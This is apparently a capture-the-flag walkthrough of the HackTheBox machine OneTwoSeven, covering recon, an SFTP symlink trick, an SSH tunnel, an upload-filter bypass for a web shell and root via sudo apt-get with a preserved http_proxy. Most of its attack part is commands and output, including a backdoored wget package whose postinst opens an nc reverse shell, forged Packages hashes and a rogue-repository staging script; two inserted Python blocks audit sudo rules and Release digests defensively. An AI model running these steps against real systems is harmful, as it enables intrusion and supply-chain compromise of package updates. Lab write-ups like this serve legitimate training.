@3rg1s
Last active October 30, 2019 13:05
5.8/10

Hackthebox OneTwoSeven

Reconnaissance

From nmap, ports 22 and 80 are open.

root@kali:# nmap -sC -sV 10.10.10.133 
# Nmap 7.60 scan initiated Thu May  9 18:38:49 2019 as: nmap -sC -sV -oA ots 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.090s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
|   256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_  256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (EdDSA)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Website port 80

Going to signup.php we get SFTP credentials:

Username: ots-2MTQ2M2I
Password: b761463b

and a personal homepage located at http://onetwoseven.htb/~ots-2MTQ2M2I/

SFTP port 22

The help command shows that a symlink command is available.

Using symlink /var/www/html/index.php index.php we can read the source code of the index page.

<?php if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" || $_SERVER['REMOTE_ADDR'] == "104.24.0.54" ) { ?>
 <li class="nav-item"><a id="adminlink" class="nav-link enabled" href="http://onetwoseven.htb:60080/">Admin</a></li>
<?php  } else { ?>
 <li class="nav-item"><a id="adminlink" class="nav-link disabled" href="http://onetwoseven.htb:60080/">Admin</a></li>
<?php  } ?>

The admin link is only enabled when the request comes from localhost, so by making our requests originate from the box itself we can reach port 60080, which reveals the admin page.

SSH tunnel

The following command forwards our local 127.0.0.1:60080 to 127.0.0.1:60080 on the onetwoseven box, so requests we send to our own loopback port arrive at the box's loopback port.

ssh -N -f ots-2MTQ2M2I@onetwoseven.htb -L 127.0.0.1:60080:127.0.0.1:60080

From the man pages:

  • -N Do not execute a remote command. This is useful for just forwarding ports.
  • -f The -f option backgrounds ssh and the remote command “sleep 10” is specified to allow an amount of time (10 seconds, in the example) to start the service which is to be tunnelled.

Admin Panel

Administration Backend Password

Log in to SFTP as ots-2MTQ2M2I with password b761463b, and then

symlink ../../../../../../../../../var/html/ to index.html, which lists the files in that directory. Download the login.php.swp file and run strings against it.

Username: ots-admin [plaintext]
Password: 11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8:Homesweethome1 [sha256, cracked by hashes.org]

Administration Backend Enumeration

Get the credentials from the Default Page and use them on SFTP.

Using the [DL] button we can download the source code of the php files.

From ots-sysupdate.php (the addon-upload case of the request switch; other cases omitted):

<?php
switch (true) {
	# Upload addon to addons folder.
	case preg_match('/\/addon-upload.php/',$_SERVER['REQUEST_URI']):
		if(isset($_FILES['addon'])){
			$errors= array();
			# Only the basename is taken; no extension or content check is done.
			$file_name = basename($_FILES['addon']['name']);
			$file_size =$_FILES['addon']['size'];
			$file_tmp =$_FILES['addon']['tmp_name'];

			if($file_size > 20000){
				$errors[]='Module too big for addon manager. Please upload manually.';
			}

			if(empty($errors)==true) {
				# The file is moved into the current directory under its original name.
				move_uploaded_file($file_tmp,$file_name);
				header("Location: /menu.php");
				header("Content-Type: text/plain");
				echo "File uploaded successfull.y";
			} else {
				header("Location: /menu.php");
				header("Content-Type: text/plain");
				echo "Error uploading the file: ";
				print_r($errors);
			}
		}
		break;
	# ... remaining cases omitted
}

and the rewrite rules

RewriteEngine On
RewriteRule ^addon-upload.php   addons/ots-man-addon.php [L]
RewriteRule ^addon-download.php addons/ots-man-addon.php [L]

send addon-upload.php to addons/ots-man-addon.php, which is what prevents us from uploading a plugin.

This can be bypassed by changing the URI.

Using the plugin upload we upload a shell.

User Shell

The uploaded file is located under /addons.

The shell runs as www-admin-data.

Privesc Enumeration

From the linenum.sh script:

We can sudo without supplying a password!
Matching Defaults entries for www-admin-data on onetwoseven:
    env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy", mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-admin-data may run the following commands on onetwoseven:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade

Because env_keep preserves http_proxy across sudo, setting http_proxy= to our web server's IP address sends every HTTP request apt makes to that server, so its log files show exactly what sudo /usr/bin/apt-get update requests. On the attacking machine, edit the hosts file and add:

127.0.0.1       localhost
127.0.1.1       kali
10.10.10.133    onetwoseven.htb packages.onetwoseven.htb
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
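The sudo rule above is dangerous because of the combination of two things: a NOPASSWD command that fetches and acts on remote content, and env_keep letting the caller's proxy variables survive into the privileged environment. The following audit script is an added example, not part of the writeup; it parses sudo -l style output (constructed here from the text above, plus a fixed variant with the env_keep entry removed) and reports NOPASSWD commands for network-fetching programs that run while proxy variables are preserved. The PROXY_VARS and NETWORK_FETCHERS lists are my own assumptions, and the parser handles only the output format shown here, not the sudoers file syntax itself.

```python
import re
import shlex

# Constructed audit input modelled on the sudo -l output quoted in the writeup.
SAMPLE_SUDO_OUTPUT = r"""Matching Defaults entries for www-admin-data on onetwoseven:
    env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy", mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-admin-data may run the following commands on onetwoseven:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""

# Constructed: the same rule after the env_keep entry has been removed.
FIXED_SUDO_OUTPUT = r"""Matching Defaults entries for www-admin-data on onetwoseven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-admin-data may run the following commands on onetwoseven:
    (ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
"""

# Assumed list: variables that redirect where a fetching tool connects.
PROXY_VARS = {"http_proxy", "https_proxy", "ftp_proxy", "all_proxy",
              "HTTP_PROXY", "HTTPS_PROXY", "FTP_PROXY", "ALL_PROXY"}
# Assumed list: programs whose privileged behaviour depends on downloaded content.
NETWORK_FETCHERS = {"apt", "apt-get", "aptitude", "pip", "pip3", "curl", "wget", "git"}


def parse_env_keep(output: str) -> set:
    """Collect variable names from env_keep= / env_keep+= entries (quoted or bare)."""
    kept = set()
    for m in re.finditer(r'env_keep\+?="([^"]*)"', output):
        kept.update(m.group(1).split())
    for m in re.finditer(r'env_keep\+?=([^\s",]+)', output):
        kept.add(m.group(1))
    return kept


def parse_nopasswd_commands(output: str) -> list:
    """Return each command listed after a NOPASSWD: tag, one entry per command."""
    cmds = []
    for line in output.splitlines():
        m = re.search(r"NOPASSWD:\s*(.+)$", line)
        if m:
            cmds.extend(c.strip() for c in m.group(1).split(","))
    return cmds


def audit(output: str) -> list:
    """Findings: NOPASSWD fetcher commands reachable while proxy variables survive sudo."""
    kept_proxy = sorted(parse_env_keep(output) & PROXY_VARS)
    findings = []
    for cmd in parse_nopasswd_commands(output):
        argv = shlex.split(cmd)
        if not argv:
            continue
        prog = argv[0].rsplit("/", 1)[-1]  # /usr/bin/apt-get -> apt-get
        if prog in NETWORK_FETCHERS and kept_proxy:
            findings.append({"command": cmd, "env_keep": kept_proxy})
    return findings
```

Running audit(SAMPLE_SUDO_OUTPUT) reports both apt-get commands together with the three proxy variables that survive; audit(FIXED_SUDO_OUTPUT) reports nothing, because without env_keep the env_reset default strips the proxy variables before the command runs. Removing the env_keep entry is only half of the fix: the repository the box updates from also needs a signed Release file, otherwise a proxy set by any other means still works.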

Apache Logs

The command sudo /usr/bin/apt-get update downloads the index files that describe the packages available for update.

Two requests are important here:

10.10.10.133 - - [03/Jun/2019:08:26:04 +0300] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages.xz HTTP/1.1" 404 497 "-" "Debian APT-HTTP/1.3 (1.4.9)"

Here apt requests the Packages.xz file.

10.10.10.133 - - [03/Jun/2019:08:26:05 +0300] "GET http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages.gz HTTP/1.1" 404 497 "-" "Debian APT-HTTP/1.3 (1.4.9)"

Here apt requests the Packages.gz file.

These archives, Packages.xz and Packages.gz, unpack to a Packages file that lists every package with its version and the hashes of its .deb, covering both the packages that may be updated and the ones already installed.

The command sudo /usr/bin/apt-get upgrade compares those hashes against what is installed and downloads the needed packages.
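The point of the next sections is that the hashes in the Packages index only protect the .deb against corruption, not against a mirror that rewrites both the package and the index. What binds the index to something trustworthy is the digest of the index in the repository's Release file, which apt normally verifies with a signature. The following is an added example, not code from the writeup: it builds a one-stanza Packages index and a Release SHA256 section from constructed placeholder package bytes (the Filename path is the one the writeup names), and checks a package both ways. Signature verification of the Release file is deliberately out of scope; the Release text here stands in for an already-verified InRelease.

```python
import gzip
import hashlib

# Constructed stand-ins for package contents; real .deb archives are not needed
# to show how the index and Release digests chain together.
GENUINE_DEB = b"!<arch>\nconstructed: genuine wget package bytes\n"
TAMPERED_DEB = b"!<arch>\nconstructed: wget package with an added postinst\n"
INDEX_PATH = "main/binary-amd64/Packages.gz"


def digests(data: bytes) -> dict:
    """The four fields apt compares a downloaded .deb against."""
    return {
        "MD5sum": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "Size": str(len(data)),
    }


def make_packages_index(deb: bytes) -> str:
    """Build a one-stanza Packages index describing `deb`."""
    d = digests(deb)
    return (
        "Package: wget\nVersion: 1.18-5+deb9u3\nArchitecture: amd64\n"
        "Filename: pool/DEBIAN-SECURITY/updates/main/w/wget/wget_1.18-5+deb9u3_amd64.deb\n"
        f"Size: {d['Size']}\nMD5sum: {d['MD5sum']}\nSHA1: {d['SHA1']}\nSHA256: {d['SHA256']}\n"
    )


def make_release(index_gz: bytes) -> str:
    """Build the SHA256 section of a Release file that pins the compressed index."""
    return (
        "Suite: ascii\nSHA256:\n"
        f" {hashlib.sha256(index_gz).hexdigest()} {len(index_gz)} {INDEX_PATH}\n"
    )


def parse_packages(text: str) -> dict:
    """Parse RFC822-style stanzas into {package name: {field: value}}."""
    stanzas, fields = {}, {}
    for line in text.splitlines():
        if not line.strip():
            if fields:
                stanzas[fields["Package"]] = fields
                fields = {}
            continue
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()
    if fields:
        stanzas[fields["Package"]] = fields
    return stanzas


def parse_release_sha256(text: str) -> dict:
    """Extract the SHA256 section of a Release file as {path: (digest, size)}."""
    entries, in_sha256 = {}, False
    for line in text.splitlines():
        if not line.startswith(" "):
            in_sha256 = line.strip() == "SHA256:"
            continue
        if in_sha256:
            digest, size, path = line.split()
            entries[path] = (digest, int(size))
    return entries


def verify_deb(fields: dict, data: bytes) -> bool:
    """What apt-get upgrade checks: the downloaded .deb against its index stanza."""
    return all(fields.get(k) == v for k, v in digests(data).items())


def verify_index(release_text: str, index_path: str, index_bytes: bytes) -> bool:
    """What ties the index to a trusted root: its digest and size in the Release file."""
    entry = parse_release_sha256(release_text).get(index_path)
    if entry is None:
        return False
    digest, size = entry
    return digest == hashlib.sha256(index_bytes).hexdigest() and size == len(index_bytes)


def scenario() -> dict:
    """Genuine repository state versus a mirror serving a re-hashed index."""
    genuine_index = make_packages_index(GENUINE_DEB)
    genuine_gz = gzip.compress(genuine_index.encode(), mtime=0)
    release = make_release(genuine_gz)  # stands in for the signed InRelease

    tampered_index = make_packages_index(TAMPERED_DEB)
    tampered_gz = gzip.compress(tampered_index.encode(), mtime=0)
    return {
        "genuine_deb_vs_genuine_index": verify_deb(parse_packages(genuine_index)["wget"], GENUINE_DEB),
        "tampered_deb_vs_genuine_index": verify_deb(parse_packages(genuine_index)["wget"], TAMPERED_DEB),
        "tampered_deb_vs_tampered_index": verify_deb(parse_packages(tampered_index)["wget"], TAMPERED_DEB),
        "genuine_index_vs_release": verify_index(release, INDEX_PATH, genuine_gz),
        "tampered_index_vs_release": verify_index(release, INDEX_PATH, tampered_gz),
    }
```

scenario() shows the two halves of the check: a modified package fails against the genuine index but passes against an index rewritten to match it, while the rewritten index itself fails against the Release digest. That is why a client that accepts an unsigned or unverified Release (for example a sources entry marked trusted=yes) is exposed to exactly the substitution described in the following sections, and why a mirror audit should compare the served Packages.gz against the Release file rather than recomputing hashes from the served .deb files.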

Goal

Our goal is to download a new version of wget, edit it by adding malicious code, and change the hashes for it inside Packages.xz and Packages.gz. Our wget package will be located at:

/var/www/html/devuan/pool/DEBIAN-SECURITY/updates/main/w/wget/wget_1.18-5+deb9u3_amd64.deb

along with some other packages required for the upgrade to happen.

Adding malicious code on wget .deb file

[X] Get wget: wget http://ftp.br.debian.org/debian/pool/main/w/wget/wget_1.20.1-1.1_amd64.deb
[X] Make a temporary directory: mkdir tmp
[X] Unpack the .deb package: dpkg-deb -R wget_1.20.1-1.1_amd64.deb tmp/
[X] Go to tmp/DEBIAN/ and create a file named postinst with execute permissions: touch postinst && chmod 0775 postinst
[X] Edit the shell script and add a malicious command:

#!/bin/bash

nc -e /bin/sh $IP $PORT

[X] Pack the .deb package again: dpkg-deb -b tmp wget_1.20.1-1.1_amd64.deb
[X] Get the md5, sha1 and sha256 hashes and the file size of wget_1.20.1-1.1_amd64.deb:

root@kali:~/Downloads# md5sum wget_1.20.1-1.1_amd64.deb && sha1sum wget_1.20.1-1.1_amd64.deb && sha256sum wget_1.20.1-1.1_amd64.deb && ls -la wget_1.20.1-1.1_amd64.deb 
083423d1b19674e3ef9c4b115d067b41  wget_1.20.1-1.1_amd64.deb
e3fa1a8902bbadfe3780f6e00be0d6cad0795fc8  wget_1.20.1-1.1_amd64.deb
68976b41f91afec38499c6d7015c73afc15a9622b2417cd6cdd73dc90f38a4b7  wget_1.20.1-1.1_amd64.deb
-rw-rw-r-- 1 fuxsocy fuxsocy 902452 Jun  6 00:06 wget_1.20.1-1.1_amd64.deb

Editing the Packages file to serve apt-get update

[X] Get Packages.gz and Packages.xz: wget http://deb.devuan.org/merged/dists/ascii-security/main/binary-amd64/Packages.gz && wget http://deb.devuan.org/merged/dists/ascii-security/main/binary-amd64/binary-amd64/Packages.xz
[X] Unzip Packages.gz, find wget inside the Packages file and change its hashes and file size.
[X] Zip Packages.gz again with the new Packages file inside.
[X] Do the same for Packages.xz.

Adding the necessary files to the web server directory

I need to create these directories in order for the sudo /usr/bin/apt-get upgrade command to work.

├── dists
│   └── ascii
│       └── main
│           └── binary-amd64
└── pool
    └── DEBIAN-SECURITY
        └── updates
            └── main
                ├── a
                │   └── apache2
                ├── b
                │   └── bind9
                ├── libp
                │   └── libpng1.6
                ├── libs
                │   └── libssh2
                ├── palio
                ├── s
                │   └── systemd
                └── w
                    └── wget

I created a bash script for that.

#!/bin/bash
# Creates the repository layout under the web root and fetches the packages
# that the upgrade pulls in alongside wget.

if [[ $EUID -ne 0 ]]; then
   echo "[i] This script must be run as root"
   exit 1
fi

basedir="/var/www/html/devuan"

mkdir -p "$basedir"

cd "$basedir" || exit 1

echo "[+] Creating directories..."

mkdir -p dists/ascii/main/binary-amd64
mkdir -p pool/DEBIAN-SECURITY/updates/main/a/apache2
mkdir -p pool/DEBIAN-SECURITY/updates/main/b/bind9
mkdir -p pool/DEBIAN-SECURITY/updates/main/libp/libpng1.6
mkdir -p pool/DEBIAN-SECURITY/updates/main/libs/libssh2
mkdir -p pool/DEBIAN-SECURITY/updates/main/s/systemd
mkdir -p pool/DEBIAN-SECURITY/updates/main/w/wget

echo "[+] Downloading packages..."

# Apache2

wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2_2.4.25-3+deb9u7_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/"
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2-bin_2.4.25-3+deb9u7_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/"
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2-data_2.4.25-3+deb9u7_all.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/"
wget -q http://ftp.br.debian.org/debian/pool/main/a/apache2/apache2-utils_2.4.25-3+deb9u7_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/a/apache2/"

# Bind9

wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/bind9-host_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libbind9-140_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libdns162_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libdns-export162_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisc160_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisccc140_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisccfg140_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/libisc-export160_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"
wget -q http://ftp.br.debian.org/debian/pool/main/b/bind9/liblwres141_9.10.3.dfsg.P4-12.3+deb9u5_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/b/bind9/"

# libpng

wget -q http://ftp.br.debian.org/debian/pool/main/libp/libpng1.6/libpng16-16_1.6.28-1+deb9u1_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/libp/libpng1.6/"

# libssh2

wget -q http://ftp.br.debian.org/debian/pool/main/libs/libssh2/libssh2-1_1.7.0-1+deb9u1_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/libs/libssh2/"

# systemd

wget -q http://ftp.br.debian.org/debian/pool/main/s/systemd/libsystemd0_232-25+deb9u11_amd64.deb -P "$basedir/pool/DEBIAN-SECURITY/updates/main/s/systemd/"

Inside

/var/www/html/devuan/dists/ascii/main/binary-amd64

I have three files, two of which are the Packages.gz and Packages.xz I edited before.

Inside /var/www/html/devuan/pool/DEBIAN-SECURITY/updates/main/w/wget I have the malicious wget package I edited before.

Getting root

All that is left is to start my web server (apache2 in my case), add an entry in /etc/hosts so that de.deb.devuan.org resolves to 10.10.10.133, start an nc listener on the port used in the postinst file, and then run sudo /usr/bin/apt-get upgrade to get a shell as the superuser.

Rooted
